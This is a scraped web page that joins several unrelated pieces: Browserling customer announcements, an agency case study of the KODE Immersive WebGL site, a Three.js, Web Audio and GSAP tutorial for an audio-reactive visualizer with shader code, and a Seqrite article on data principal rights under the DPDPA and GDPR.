Success! Publuu, a leader in digital publishing, is now a Browserling customer!
It’s another small step for a ling but one giant leap for ling kind.
What Is Browserling?
Browserling is a cross-browser testing service that lets users test websites and web applications in different browsers to ensure they work correctly. It also works as a browser sandbox, allowing users to safely check suspicious links and web pages without affecting their own devices. Developers, testers, and regular users can use it to see how websites look and behave across different browsers. IT security professionals find it useful for safely analyzing links and identifying potential vulnerabilities in a secure environment.
Who Uses Browserling?
Browserling has now become the cross-browser testing service of choice and it’s used by hundreds of thousands of users around the world every month. Browserling’s customers include governments, states, cities, banks, stock exchanges, universities, newspapers, and Fortune 100 companies.
Success! Pelican, a top provider of protective equipment, is now a Browserling customer!
It’s another small step for a ling but one giant leap for ling kind.
KODE Immersive fuses AR, VR, real-time 3D, and spatial computing to craft high-impact, interactive experiences. It’s not just a platform – it’s a portal. Designed to ignite emotion, shatter expectations, and redefine digital engagement.
Our challenge? To bring this pioneering vision to life, not just by explaining what KODE Immersive is, but by making visitors experience what it’s like to be inside it.
Background
Our relationship with KODE began in 2022 when we extended their brand identity and reimagined their digital home. What started as a brand refresh quickly evolved into a creative partnership rooted in shared values and a mutual obsession with crafted brand experience and beautiful design.
In late 2024, KODE approached us with a new venture. This time, they were diving headfirst into emerging technologies (AI, WebXR, and real-time 3D) to expand their service offering. We knew immediately that this was the kind of project you dream about. It was a timely opportunity, and it got us excited to push boundaries.
The Brief
The brief was as open as it gets. Beyond a few core objectives (namely, budget and timeline), there were no strict constraints. We received a three-slide deck: a name, a positioning statement, three brand pillars (CREATE, IDEATE, DELIVER), and a few straplines.
No case studies. No visual identity. Just a bold vision.
And that freedom became our greatest asset. We built everything from scratch – visual language, tone, interactions – while staying mindful of budget and speed. Our approach: move fast, iterate often, and push boundaries.
To pull it off, we adopted a phased R&D process. We teamed up with the brilliant Francesco Michelini (who previously helped build the Malvah website). Francesco lives and breathes WebGL. He once spent a week refining a mechanic we had already agreed to abandon, just because he couldn’t accept defeat. That kind of drive made him the perfect collaborator.
Our Process
We used KODE Immersive as a live testing ground for our refined four-phase process, aimed at delivering the best creative solutions while avoiding unnecessary feedback loops. Here’s how it shaped the final outcome.
01 Discover
We kicked things off with an in-depth strategy session where we unpacked the brief, explored concepts, discussed competitors, and mapped out technical possibilities. Style tiles helped form the foundation of our visual language.
Typography was the key differentiator. We knew the right typeface would communicate innovation and intent. After multiple rounds, we landed on Brut by Off-Type – an unconventional mono-inspired form that struck just the right balance of structure and tension.
Colour took cues from the parent brand, but we flipped the hierarchy. Orange became the dominant tone, with bold black moments layered throughout. Familiar, yet distinctive.
Iconography evolved from KODE’s chevron mark. We repurposed it as a modular, dynamic system to guide interactions and reflect the brand’s three core pillars.
02 Create
This phase became interesting: since the experience would rely heavily on user interaction, it was driven more by prototyping than traditional design. We worked in tight, iterative loops with the client across design, 3D, and development to test feasibility early and often. It became an extremely organic process – ideal for reaching the deadline while stretching limitations.
From the start, we knew we didn’t just want users to interact—we wanted them to feel immersed. To lose track of time by being emotionally and mentally engaged.
We developed a range of 3D concepts in Cinema 4D and funnelled them through R&D cycles. The process required a lot of iterating and revisiting creative solutions, but it was always collaborative – and ultimately, essential for innovation.
03 Craft
This is where the magic happens.
Our craft is what we consider our special sauce at Malvah – this is where we like to push, refine, and design with intent and clarity. It’s hard not to get lost in the sauce. Massive respect to Francesco during this phase, as it is the most intense in terms of iterations: from shader logic to ambient lighting to the haptic quality of cursor interactions, every component was built to feel immersive yet effortless. Luckily, Francesco is an actual living wizard and provided us with testing environments where we could craft all these elements seamlessly.
Still, something was missing! The high-fidelity 3D was clashing with the flat backgrounds. The fix? A subtle layer of pixel distortion and soft noise texture. Minimal, but transformative. Suddenly the whole experience felt unified – like everything finally belonged together.
04 Deliver
By final QA, most of the heavy lifting was done. We stress-tested performance across browsers, devices, and connection speeds. We refined micro-interactions and polished details based on early user feedback.
Tech Stack
Nerd stuff alert.
From the outset, this was always going to be a Three.js and WebGL project – not for the novelty, but for the storytelling power. Real-time 3D let us turn a static brand into a living, breathing experience. We used Cinema 4D for concepting and prototyping, from early ideation through to final modelling and matcap creation.
One of the most impactful performance optimisations came through the use of BatchedMesh, which enabled us to draw multiple meshes sharing the same material in a single draw call. Since draw calls are among the most expensive operations in WebGL, this dramatically improved efficiency, reducing calls from 40 or 50 down to just one. You’ll see this in action in both the hero section and the footer, where we also implemented the Rapier physics engine for dynamic interaction.
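To illustrate the idea, here is a minimal, hypothetical sketch rather than the production code – the names and buffer sizes are placeholders, and the exact BatchedMesh API has shifted slightly between recent Three.js releases:
const MAX_INSTANCES = 50;
// One material shared by every instance – the whole batch renders in a single draw call.
const batched = new THREE.BatchedMesh(MAX_INSTANCES, 5000, 10000, sharedMaterial);
const geometryId = batched.addGeometry(chevronGeometry); // register the geometry once
const matrix = new THREE.Matrix4();
for (let i = 0; i < MAX_INSTANCES; i++) {
  // Recent releases create instances explicitly; older ones returned an
  // instance id straight from addGeometry().
  const instanceId = batched.addInstance(geometryId);
  matrix.setPosition(Math.random() * 10 - 5, Math.random() * 10 - 5, 0);
  batched.setMatrixAt(instanceId, matrix);
}
scene.add(batched); // dozens of meshes, one draw call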
The real breakthrough, however, was moving the rendering of our most resource-intensive canvases to an OffscreenCanvas, with all related logic handled inside a WebWorker. This shift happened later in the project and required significant reworking, but the gains in performance and responsiveness were undeniable. It was a technically ambitious move, but one that paid off.
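The pattern looks roughly like this – a simplified sketch with placeholder file names, not KODE’s actual code:
// main thread: hand the heavy canvas over to a worker
const canvas = document.querySelector('#heavy-canvas');
const offscreen = canvas.transferControlToOffscreen();
const worker = new Worker('render.worker.js');
worker.postMessage({ canvas: offscreen, width: innerWidth, height: innerHeight }, [offscreen]);

// render.worker.js: all WebGL work now happens off the main thread
// (Three.js is loaded in the worker via importScripts or a module worker)
self.onmessage = ({ data }) => {
  const renderer = new THREE.WebGLRenderer({ canvas: data.canvas, antialias: true });
  renderer.setSize(data.width, data.height, false);
  // build the scene here, then run the usual requestAnimationFrame loop
};
Because the render loop no longer competes with layout, scrolling, and other main-thread work, heavy scenes stay responsive even while the page is busy.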
Features
The site follows a continuous scroll narrative – a careful dance between interactivity, emotion, and information – with the primary goal of provoking curiosity and inviting deep engagement. From top to bottom, here’s a rundown of our favourite features.
Chevron
We land on the hero of the brand: the logo-mark. The chevron is the anchor, both literally and metaphorically – the driving force behind the iconography that funnels through the experience. We wanted the entry point to set the tone: bold, dynamic, and intuitive for the user to explore.
Shifting Text
One of those happy accidents. Inspired by a line that didn’t make the final copy, we developed a mechanic where text splits and shifts as the cursor moves. A metaphor for deconstruction and reformation – fluid, dynamic, alive.
Icons
A playful space to explore, discover, and interact. Designed to echo the brand’s chevron and embody its core pillars.
Menu
One of our favourite elements. It subverts the typical UX pattern by growing from the base and transforming into the footer as users scroll; a small disruption that makes a big impact.
SFX
Sound is often the unsung hero. We follow the 80/20 rule here, also known as the Pareto Principle – just the right amount to amplify emotion without overwhelming the experience. From section transitions to hover feedback, the layered soundscape adds depth and atmosphere. The transition from the landing section to the services leaves the user feeling as if they are entering a new realm.
We worked with Martin Leitner from Sounds Good to curate the sound elements, aiding the experience and bringing the interaction with the 3D elements to life. This was such a great experience, and Martin’s enthusiasm helped drive the process and the team’s excitement.
Easter Egg
We always planned for an easter egg; we just didn’t know what it was until it revealed itself.
A sketch mechanic, pulled from KODE’s visual identity, was integrated into the cursor. Users can draw on the screen to reveal a hidden layer; a playful nod to the analogue-digital duality of the brand.
Early testers were missing it entirely, so we added a subtle auto-activation trigger at just the right moment. Problem solved.
Reflections
This project reminded us that the best results often emerge from ambiguity. No case studies. No visual assets. No roadmap. Just vision and trust.
While we’re proud of what we’ve delivered, we’ve only scratched the surface. Phase Two will introduce interactive case studies and deeper storytelling. We’re especially excited to explore a z-axis scroll journey through each service, bringing dimension and discovery to the next level. For now, KODE Immersive is live.
Success! Amnesty International, a global advocate for human rights, is now a Browserling customer!
It’s another small step for a ling but one giant leap for ling kind.
Sound is vibration, vision is vibration you can see. I’m always chasing the moment those waves overlap. For a recent Webflow & GSAP community challenge focusing on GSAP Draggable and Inertia Plugin, I decided to push the idea further by building a futuristic audio-reactive visualizer. The concept was to create a sci-fi “anomaly detector” interface that reacts to music in real time, blending moody visuals with sound.
The concept began with a simple image in my mind: a glowing orange-to-white sphere sitting alone in a dark void, the core that would later pulse with the music. To solidify the idea, I ran this prompt through Midjourney: “Glowing orange and white gradient sphere, soft blurry layers, smooth distortion, dark black background, subtle film-grain, retro-analog vibe, cinematic lighting.” After a few iterations I picked the frame that felt right, gave it a quick color pass in Photoshop, and used that clean, luminous orb as the visual foundation for the entire audio-reactive build.
Midjourney explorations
The project was originally built as an entry for the Webflow × GSAP Community Challenge (Week 2: “Draggable & Inertia”), which encouraged the use of GSAP’s dragging and inertia capabilities. This context influenced the features: I made the on-screen control panels draggable with momentum, and even gave the 3D orb a subtle inertia-driven movement when “flung”. In this article, I’ll walk you through the entire process – from setting up the Three.js scene and analyzing audio with the Web Audio API, to creating custom shaders and adding GSAP animations and interactivity. By the end, you’ll see how code, visuals, and sound come together to create an immersive audio visualizer.
Setting Up the Three.js Scene
To build the 3D portion, I used Three.js to create a scene containing a dynamic sphere (the “anomaly”) and other visual elements.
We start with the usual Three.js setup: a scene, a camera, and a renderer. I went with a perspective camera to get a nice 3D view of our orb and placed it a bit back so the object is fully in frame.
An OrbitControls is used to allow basic click-and-drag orbiting around the object (with some damping for smoothness). Here’s a simplified snippet of the initial setup:
// Initialize Three.js scene, camera, renderer
const scene = new THREE.Scene();
const camera = new THREE.PerspectiveCamera(75, window.innerWidth/window.innerHeight, 0.1, 100);
camera.position.set(0, 0, 10); // camera back a bit from origin
const renderer = new THREE.WebGLRenderer({ antialias: true });
renderer.setSize(window.innerWidth, window.innerHeight);
document.body.appendChild(renderer.domElement);
// Add OrbitControls for camera rotation
const controls = new THREE.OrbitControls(camera, renderer.domElement);
controls.enableDamping = true;
controls.dampingFactor = 0.1;
controls.rotateSpeed = 0.5;
controls.enableZoom = false; // lock zoom for a more fixed view
Next, I created the anomaly object. This is the main feature: a spiky wireframe sphere that reacts to audio. Three.js provides shapes like SphereGeometry or IcosahedronGeometry that we can use for a sphere. I chose an icosahedron geometry because it gives an interesting multi-sided look and allows easy control of detail (via a subdivision level). The anomaly is actually composed of two overlapping parts:
Outer wireframe sphere: An IcosahedronGeometry with a custom ShaderMaterial that draws it as a glowing wireframe. This part will distort based on music (imagine it “vibrating” and morphing with the beat).
Inner glow sphere: A slightly larger SphereGeometry drawn with a semi-transparent, emissive shader (using the backside of the geometry) to create a halo or aura around the wireframe. This gives the orb a warm glow effect, like an energy field.
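Putting that structure together looks roughly like this (a simplified sketch; outerMaterial and glowMaterial are the shader materials covered later, and the radius and detail values are just illustrative):
const radius = 2;
const outerGeometry = new THREE.IcosahedronGeometry(radius, 4);  // subdivision level 4
const outerMesh = new THREE.Mesh(outerGeometry, outerMaterial);  // glowing wireframe shell
const glowGeometry = new THREE.SphereGeometry(radius * 1.2, 64, 64);
const glowMesh = new THREE.Mesh(glowGeometry, glowMaterial);     // soft halo around it
scene.add(outerMesh, glowMesh);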
I also added in some extra visuals: a field of tiny particles floating in the background (for a depth effect, like dust or sparks) and a subtle grid overlay in the UI (more on the UI later). The scene’s background is set to a dark color, and I layered a background image (the edited Midjourney visual) behind the canvas to create the mysterious-alien landscape horizon. This combination of 3D objects and 2D backdrop creates the illusion of a holographic display over a planetary surface.
Integrating the Web Audio API for Music Analysis
With the 3D scene in place, the next step was making it respond to music. This is where the Web Audio API comes in. I allowed the user to either upload an audio file or pick one of the four provided tracks. When the audio plays, we tap into the audio stream and analyze its frequencies in real-time using an AnalyserNode. The AnalyserNode gives us access to frequency data. This is a snapshot of the audio spectrum (bass, mids, treble levels, etc.) at any given moment, which we can use to drive animations.
To set this up, I created an AudioContext and an AnalyserNode, and connected an audio source to it. If you’re using an <audio> element for playback, you can create a MediaElementSource from it and pipe that into the analyser. For example:
// Create AudioContext and Analyser
const audioContext = new (window.AudioContext || window.webkitAudioContext)();
const analyser = audioContext.createAnalyser();
analyser.fftSize = 2048; // Use an FFT size of 2048 for analysis
analyser.smoothingTimeConstant = 0.8; // Smooth out the frequencies a bit
// Connect an audio element source to the analyser
const audioElement = document.getElementById('audio-player'); // <audio> element
const source = audioContext.createMediaElementSource(audioElement);
source.connect(analyser);
analyser.connect(audioContext.destination); // connect to output so sound plays
Here we set fftSize to 2048, which means the analyser will break the audio into 1024 frequency bins (frequencyBinCount is half of fftSize). We also set a smoothingTimeConstant to make the data less jumpy frame-to-frame. Now, as the audio plays, we can repeatedly query the analyser for data. The method analyser.getByteFrequencyData(array) fills an array with the current frequency magnitudes (0–255) across the spectrum. Similarly, getByteTimeDomainData gives waveform amplitude data. In our animation loop, I call analyser.getByteFrequencyData() on each frame to get fresh data:
const frequencyData = new Uint8Array(analyser.frequencyBinCount);
let audioLevel = 0; // overall music intensity, shared with the rendering code below

function animate() {
  requestAnimationFrame(animate);
  // ... update Three.js controls, etc.
  if (analyser) {
    analyser.getByteFrequencyData(frequencyData);
    // Compute an average volume level from frequency data
    let sum = 0;
    for (let i = 0; i < frequencyData.length; i++) {
      sum += frequencyData[i];
    }
    const average = sum / frequencyData.length;
    audioLevel = average / 255; // normalize to 0.0–1.0
    // Apply a sensitivity scaling (from a UI slider)
    audioLevel *= (sensitivity / 5.0);
    // Now audioLevel represents the intensity of the music (0 = silence, ~1 = very loud)
  }
  // ... (use audioLevel to update visuals)
  renderer.render(scene, camera);
}
In my case, I also identified a “peak frequency” (the frequency bin with the highest amplitude at a given moment) and some other metrics just for fun, which I display on the UI (e.g. showing the dominant frequency in Hz, amplitude, etc., as “Anomaly Metrics”). But the key takeaway is the audioLevel – a value representing overall music intensity – which we’ll use to drive the 3D visual changes.
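For reference, the dominant frequency can be pulled from the same frequencyData array; a rough sketch (the Hz conversion assumes the standard bin-to-frequency mapping):
let peakIndex = 0;
for (let i = 1; i < frequencyData.length; i++) {
  if (frequencyData[i] > frequencyData[peakIndex]) peakIndex = i;
}
// Each bin covers sampleRate / fftSize Hz, so bin index maps to frequency:
const peakHz = peakIndex * audioContext.sampleRate / analyser.fftSize;
// peakHz (and the bin's amplitude) can then be shown in the "Anomaly Metrics" panel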
Syncing Audio with Visuals: Once we have audioLevel, we can inject it into our Three.js world. I passed this value into the shaders as a uniform every frame, and also used it to tweak some high-level motion (like rotation speed). Additionally, GSAP animations were triggered by play/pause events (for example, a slight camera zoom when music starts, which we’ll cover next). The result is that the visuals move in time with the music: louder or more intense moments in the audio make the anomaly glow brighter and distort more, while quiet moments cause it to settle down.
Creating the Audio-Reactive Shaders
To achieve the dynamic look for the anomaly, I used custom GLSL shaders in the material. Three.js lets us write our own shaders via THREE.ShaderMaterial, which is perfect for this because it gives fine-grained control over vertex positions and fragment colors. This might sound difficult if you’re new to shaders, but conceptually we did two major things in the shader:
Vertex Distortion with Noise: We displace the vertices of the sphere mesh over time to make it wobble and spike. I included a 3D noise function (Simplex noise) in the vertex shader – it produces a smooth pseudo-random value for any 3D coordinate. For each vertex, I calculate a noise value based on its position (plus a time factor to animate it). Then I move the vertex along its normal by an amount proportional to that noise. We also multiply this by our audioLevel and a user-controlled distortion factor. Essentially, when the music is intense (high audioLevel), the sphere gets spikier and more chaotic; when the music is soft or paused, the sphere is almost smooth.
Fresnel Glow in Fragment Shader: To make the wireframe edges glow and fade realistically, I used a fresnel effect in the fragment shader. This effect makes surfaces more luminous at glancing angles. We calculate it by taking the dot product of the view direction and the vertex normal – it results in a value that’s small on edges (grazing angles) and larger on faces directly facing the camera. By inverting and exponentiating this, we get a nice glow on the outline of the sphere that intensifies at the edges. I modulated the fresnel intensity with the audioLevel as well, so the glow pulsates with the beat.
Let’s look at a simplified version of the shader code for the outer wireframe sphere material:
const outerMaterial = new THREE.ShaderMaterial({
  uniforms: {
    time:       { value: 0 },
    audioLevel: { value: 0 },   // this will be updated each frame
    distortion: { value: 1.0 },
    color:      { value: new THREE.Color(0xff4e42) } // a reddish-orange base color
  },
  wireframe: true,
  transparent: true,
  vertexShader: `
    uniform float time;
    uniform float audioLevel;
    uniform float distortion;
    varying vec3 vNormal;
    varying vec3 vPosition;
    // (noise function omitted for brevity)
    void main() {
      // Start with the original position
      vec3 pos = position;
      // Calculate procedural noise value for this vertex (using its position and time)
      float noise = snoise(pos * 0.5 + vec3(0.0, 0.0, time * 0.3));
      // Displace vertex along its normal
      pos += normal * noise * distortion * (1.0 + audioLevel);
      // Pass world-space normal and position to the fragment shader for the fresnel term
      vNormal = normalize(mat3(modelMatrix) * normal);
      vPosition = (modelMatrix * vec4(pos, 1.0)).xyz;
      // Standard transformation
      gl_Position = projectionMatrix * modelViewMatrix * vec4(pos, 1.0);
    }
  `,
  fragmentShader: `
    uniform vec3 color;
    uniform float time;
    uniform float audioLevel;
    varying vec3 vNormal;
    varying vec3 vPosition;
    void main() {
      // Calculate fresnel (view-angle dependent) term
      vec3 viewDir = normalize(cameraPosition - vPosition);
      float fresnel = 1.0 - max(0.0, dot(viewDir, vNormal));
      fresnel = pow(fresnel, 2.0 + audioLevel * 2.0);
      // Make the fragment color brighter on edges (fresnel) and pulse it slightly with time
      float pulse = 0.8 + 0.2 * sin(time * 2.0);
      vec3 emissiveColor = color * fresnel * pulse * (1.0 + audioLevel * 0.8);
      // Alpha fades out a bit when audio is high (to make spikes more ethereal)
      float alpha = fresnel * (0.7 - audioLevel * 0.3);
      gl_FragColor = vec4(emissiveColor, alpha);
    }
  `
});
In this shader, snoise is a Simplex noise function (not shown above) producing values ~-1 to 1. The vertex shader uses it to offset each vertex (pos += normal * noise * …). We multiply the noise by (1.0 + audioLevel) so that when audioLevel rises, the displacement increases. The distortion uniform is controlled by a slider in the UI, so the user can manually dial the overall spikiness. The fragment shader calculates a fresnel factor to make the wireframe edges glow. Notice how audioLevel factors into the power and into the final color intensity – louder audio makes the fresnel exponent higher (sharper glow) and also increases brightness a bit. We also included a gentle pulsing (sin(time)) independent of audio, just to give a constant breathing motion.
For the inner glow sphere, we used a separate ShaderMaterial: it’s basically a sphere drawn with side: THREE.BackSide (so we see the inner surface) and Additive Blending to give a blooming halo. Its fragment shader also uses a fresnel term, but with a much lower alpha so it appears as a soft haze around the orb. The inner sphere’s size is slightly larger (I used about 1.2× the radius of the outer sphere) so that the glow extends beyond the wireframe. When combined, the outer and inner shaders create the effect of a translucent, energy-filled orb whose surface ripples with music.
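For completeness, the inner glow material looks roughly like this – a simplified sketch rather than the exact production shader (depthWrite: false is my own addition, used here to keep the haze from occluding the wireframe):
const glowMaterial = new THREE.ShaderMaterial({
  uniforms: {
    time:       { value: 0 },
    audioLevel: { value: 0 },
    color:      { value: new THREE.Color(0xff4e42) }
  },
  side: THREE.BackSide,             // render the inside of the slightly larger sphere
  blending: THREE.AdditiveBlending, // colors add up, giving a bloom-like halo
  transparent: true,
  depthWrite: false,                // assumption: prevents the haze hiding the wireframe
  vertexShader: `
    varying vec3 vNormal;
    varying vec3 vPosition;
    void main() {
      vNormal = normalize(mat3(modelMatrix) * normal);
      vPosition = (modelMatrix * vec4(position, 1.0)).xyz;
      gl_Position = projectionMatrix * modelViewMatrix * vec4(position, 1.0);
    }
  `,
  fragmentShader: `
    uniform vec3 color;
    uniform float audioLevel;
    varying vec3 vNormal;
    varying vec3 vPosition;
    void main() {
      vec3 viewDir = normalize(cameraPosition - vPosition);
      // Bright at the silhouette, dim at the center, regardless of normal orientation
      float rim = pow(1.0 - abs(dot(viewDir, normalize(vNormal))), 3.0);
      // Much lower alpha than the outer shell, so it reads as a soft haze
      gl_FragColor = vec4(color * rim * (1.0 + audioLevel), rim * 0.25);
    }
  `
});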
To tie it all together, every frame in the render loop I update the shader uniforms with the current time and audio level:
// in the animation loop:
outerMaterial.uniforms.time.value = elapsedTime;
outerMaterial.uniforms.audioLevel.value = audioLevel;
outerMaterial.uniforms.distortion.value = currentDistortion;
glowMaterial.uniforms.time.value = elapsedTime;
glowMaterial.uniforms.audioLevel.value = audioLevel;
The result is a 3D object that truly feels alive with the music: it oscillates, pulses, and glows in sync with whatever track is playing – even the one you upload yourself.
Animations and Interactions with GSAP
With the visuals reacting to sound, I added GSAP to handle smooth animations and user interactions. GSAP is great for creating timeline sequences and tweening properties with easing, and it also comes with plugins that were perfect for this project: Draggable for click-and-drag UI, and InertiaPlugin for momentum. Best of all, every GSAP plugin is now completely free to use. Below are the key ways I used GSAP in the project:
Intro Animation & Camera Movement: When the user selects a track and hits play, I trigger a brief “activation” sequence. This involves some text appearing in the “terminal” and a slight camera zoom-in toward the orb to signal that the system is online. The camera movement was done with a simple GSAP tween of the camera’s position. For example, I defined a default camera position and a slightly closer “zoomed” position. On play, I use gsap.to() to interpolate the camera position to the zoomed-in coordinates, and on pause/stop I tween it back out. GSAP makes this kind of 3D property animation straightforward:
const defaultCameraPos = { x: 0, y: 0, z: 10 };
const zoomedCameraPos = { x: 0, y: 0, z: 7 }; // move camera closer on zoom
function zoomCameraForAudio(zoomIn) {
  const target = zoomIn ? zoomedCameraPos : defaultCameraPos;
  gsap.to(camera.position, {
    x: target.x,
    y: target.y,
    z: target.z,
    duration: 1.5,
    ease: "power2.inOut"
  });
}
// When audio starts:
zoomCameraForAudio(true);
// When audio ends or is stopped:
zoomCameraForAudio(false);
This smooth zoom adds drama when the music kicks in, drawing the viewer into the scene. The power2.inOut easing gives it a nice gentle start and stop. I also used GSAP timelines for any other scripted sequences (like fading out the “Analyzing…” overlay text after a few seconds), since GSAP’s timeline control is very handy for orchestrating multiple animations in order.
Draggable UI Panels: The interface has a few UI components overlaying the 3D canvas – e.g. an “Anomaly Controls” panel (with sliders for rotation speed, distortion amount, etc.), an “Audio Spectrum Analyzer” panel (showing a bar graph of frequencies and track selection buttons), and a “System Terminal” readout (displaying log messages like a console). To make the experience playful, I made these panels draggable. Using GSAP’s Draggable plugin, I simply turned each .panel element into a draggable object:
Draggable.create(".panel", {
  type: "x,y",
  bounds: "body",       // confine dragging within the viewport
  inertia: true,        // enable momentum after release
  edgeResistance: 0.65, // a bit of resistance at the edges
  onDragStart: () => { /* bring panel to front, etc. */ },
  onDragEnd: function() {
    // Optionally, log the velocity or other info for fun
    console.log("Panel thrown with velocity:", this.getVelocity());
  }
});
Setting inertia: true means when the user releases a panel, it will continue moving in the direction they tossed it, gradually slowing to a stop (thanks to InertiaPlugin). This little touch makes the UI feel more tactile and real – you can flick the panels around and they slide with some “weight.” According to GSAP’s docs, Draggable will automatically handle the physics when inertia is enabled, so it was plug-and-play. I also constrained dragging within the body bounds so panels don’t get lost off-screen. Each panel has a clickable header (a drag handle area), set via the handle option, to restrict where a user can grab it. Under the hood, InertiaPlugin calculates the velocity of the drag and creates a tween that smoothly decelerates the element after you let go, mimicking friction.
Interactive Orb Drag (Bonus): As a creative experiment, I even made the 3D anomaly orb itself draggable. This was a bit more involved since it’s not a DOM element, but I implemented it by raycasting for clicks on the 3D object and then rotating the object based on mouse movement. I applied a similar inertia effect manually: when you “throw” the orb, it keeps spinning and slowly comes to rest. This wasn’t using GSAP’s Draggable directly (since that works in screen space), but I did use the InertiaPlugin concept by capturing the drag velocity and then using an inertial decay on that velocity each frame. It added a fun way to interact with the visualizer – you can nudge the orb and see it respond physically. For example, if you drag and release quickly, the orb will continue rotating with momentum. This kind of custom 3D dragging is outside the scope of a basic tutorial, but it shows how you can combine your own logic with GSAP’s physics concepts to enrich interactions.
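Conceptually, the manual inertia boils down to tracking the drag velocity and decaying it every frame. Here’s a rough sketch with hypothetical names (anomalyMesh, isDragging), not the actual implementation:
let dragVelocity = { x: 0, y: 0 };
let isDragging = false; // toggled by pointerdown/pointerup plus a raycast hit test

window.addEventListener('pointermove', (e) => {
  if (!isDragging) return;
  // Convert pointer movement into rotation and remember it as velocity
  dragVelocity.x = e.movementX * 0.005;
  dragVelocity.y = e.movementY * 0.005;
  anomalyMesh.rotation.y += dragVelocity.x;
  anomalyMesh.rotation.x += dragVelocity.y;
});

// Called every frame from the render loop once the pointer is released
function applyInertia() {
  if (isDragging) return;
  anomalyMesh.rotation.y += dragVelocity.x;
  anomalyMesh.rotation.x += dragVelocity.y;
  dragVelocity.x *= 0.95; // friction-like decay, so the spin slowly settles
  dragVelocity.y *= 0.95;
}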
GSAP Draggable and Inertia in action
In summary, GSAP handles all the non-audio animations: the camera moves, panel drags, and little transitions in the UI. The combination of sound-reactive shader animations (running every frame based on audio data) and event-based GSAP tweens (triggered on user actions or certain times) gives a layered result where everything feels responsive and alive.
UI and Atmosphere
Finally, a few words about the surrounding UI/atmosphere which glue the experience together. The visualizer’s style was inspired by sci-fi control panels, so I leaned into that:
Control Panels and Readouts: I built the overlay UI with HTML/CSS, keeping it minimalistic (just semi-transparent dark panels with light text and a few sliders/buttons). Key controls include rotation speed (how fast the orb spins), resolution (tessellation level of the icosahedron mesh), distortion amount, audio reactivity (scaling of audio impact), and sensitivity (which adjusts how the audio’s volume is interpreted). Changing these in real-time immediately affects the Three.js scene – for example, dragging the “Resolution” slider rebuilds the icosahedron geometry with more or fewer triangles (see the sketch after this list), which is a cool way to see the orb go from coarse to finely subdivided. The “Audio Spectrum Analyzer” panel displays a classic bar graph of frequencies (drawn on a canvas using the analyser data) so you have a 2D visualization accompanying the 3D one. There’s also a console-style terminal readout that logs events (like “AUDIO ANALYSIS SYSTEM INITIALIZED” or the velocity of drags in a playful GSAP log format) to reinforce the concept of a high-tech system at work.
Design elements: To boost the sci-fi feel, I added a subtle grid overlay across the whole screen. This was done with pure CSS – a pair of repeating linear gradients forming horizontal and vertical lines (1px thin, very transparent) over a transparent background. It’s barely noticeable but gives a technical texture, especially against the glow of the orb. I also added some drifting ambient particles (tiny dots) floating slowly in the background, implemented as simple divs animated with JavaScript. They move in pseudo-random orbits.
Soundtrack: I curated three atmospheric and moody tracks, along with one of my own unreleased tracks, under my music alias LXSTNGHT. The track was produced in Ableton, and it’s unfinished. The end result is an experience where design, code, and music production collide in real time.
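As referenced above, the “Resolution” control can simply swap the geometry in place. An illustrative sketch (the slider element name is hypothetical):
resolutionSlider.addEventListener('input', (e) => {
  const detail = parseInt(e.target.value, 10);  // icosahedron subdivision level
  outerMesh.geometry.dispose();                 // free the old geometry on the GPU
  outerMesh.geometry = new THREE.IcosahedronGeometry(radius, detail);
});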
Bringing all these elements together, the final result is an interactive art piece: you load a track, the “Audio ARK” system comes online with a flurry of text feedback, the ambient music starts playing, and the orb begins to pulse and mutate in sync with the sound. You can tweak controls or toss around panels (or the orb itself) to explore different visuals.
The combination of Three.js (for rendering and shader effects), Web Audio API (for sound analysis), and GSAP (for polished interactions) showcases how creative coding tools can merge to produce an immersive experience that engages multiple senses.
As data privacy laws evolve globally—from the GDPR to India’s Digital Personal Data Protection Act (DPDPA)—one common theme emerges: empowering individuals with control over their data. This shift places data principal rights at the center of privacy compliance.
Respecting these rights isn’t just a legal obligation for organizations; it’s a business imperative. Efficiently operationalizing and fulfilling data principal rights is now a cornerstone of modern privacy programs.
Understanding Data Principal Rights
Data principal rights refer to the entitlements granted to individuals regarding their data. Under laws like the DPDPA and GDPR, these typically include:
Right to Access: Individuals can request a copy of the personal data held about them.
Right to Correction: They can demand corrections to inaccurate or outdated data.
Right to Erasure (Right to Be Forgotten): They can request deletion of their data under specific circumstances.
Right to Data Portability: They can request their data in a machine-readable format.
Right to Withdraw Consent: They can withdraw previously given consent for data processing.
Right to Grievance Redressal: They can lodge complaints if their rights are not respected.
While these rights sound straightforward, fulfilling them at scale is anything but simple, especially when data is scattered across cloud platforms, internal systems, and third-party applications.
Why Data Principal Rights Management is Critical
Regulatory Compliance and Avoidance of Penalties
Non-compliance can result in substantial fines, regulatory scrutiny, and reputational harm. For instance, DPDPA empowers the Data Protection Board of India to impose heavy penalties for failure to honor data principal rights on time.
Customer Trust and Transparency
Respecting user rights builds transparency and demonstrates that your organization values privacy. This can increase customer loyalty and strengthen brand reputation in privacy-conscious markets.
Operational Readiness and Risk Reduction
Organizations risk delays, errors, and missed deadlines when rights requests are handled manually. An automated and structured rights management process reduces legal risk and improves operational agility.
Auditability and Accountability
Every action taken to fulfill a rights request must be logged and documented. This is essential for proving compliance during audits or investigations.
The Role of Data Discovery in Rights Fulfilment
To respond to any data principal request, you must first know where the relevant personal data resides. This is where Data Discovery plays a crucial supporting role.
A robust data discovery framework enables organizations to:
Identify all systems and repositories that store personal data.
Correlate data to specific individuals or identifiers.
Retrieve, correct, delete, or port data accurately and quickly.
Without comprehensive data visibility, any data principal rights management program will fail, resulting in delays, partial responses, or non-compliance.
Key Challenges in Rights Management
Despite its importance, many organizations struggle with implementing effective data principal rights management due to:
Fragmented data environments: Personal data is often stored in silos, making it challenging to aggregate and act upon.
Manual workflows: Fulfilling rights requests often involves slow, error-prone manual processes.
Authentication complexities: Verifying the identity of the data principal securely is essential to prevent abuse of rights.
Lack of audit trails: Without automated tracking, it’s hard to demonstrate compliance.
Building a Scalable Data Principal Rights Management Framework
To overcome these challenges, organizations must invest in technologies and workflows that automate and streamline the lifecycle of rights requests. A mature data principal rights management framework should include:
Centralized request intake: A portal or dashboard where individuals can easily submit rights requests.
Automated data mapping: Leveraging data discovery tools to locate relevant personal data quickly.
Workflow automation: Routing requests to appropriate teams with built-in deadlines and escalation paths.
Verification and consent tracking: Ensuring that only verified individuals can initiate requests, and tracking their consent history.
Comprehensive logging: Maintaining a tamper-proof audit trail of all actions to fulfill requests.
The Future of Privacy Lies in Empowerment
As data privacy regulations mature, the focus shifts from mere protection to empowerment. Data principals are no longer passive subjects but active stakeholders in how their data is handled. Organizations that embed data principal rights management into their core data governance strategy will stay compliant and gain a competitive edge in building customer trust.
Empower Your Privacy Program with Seqrite
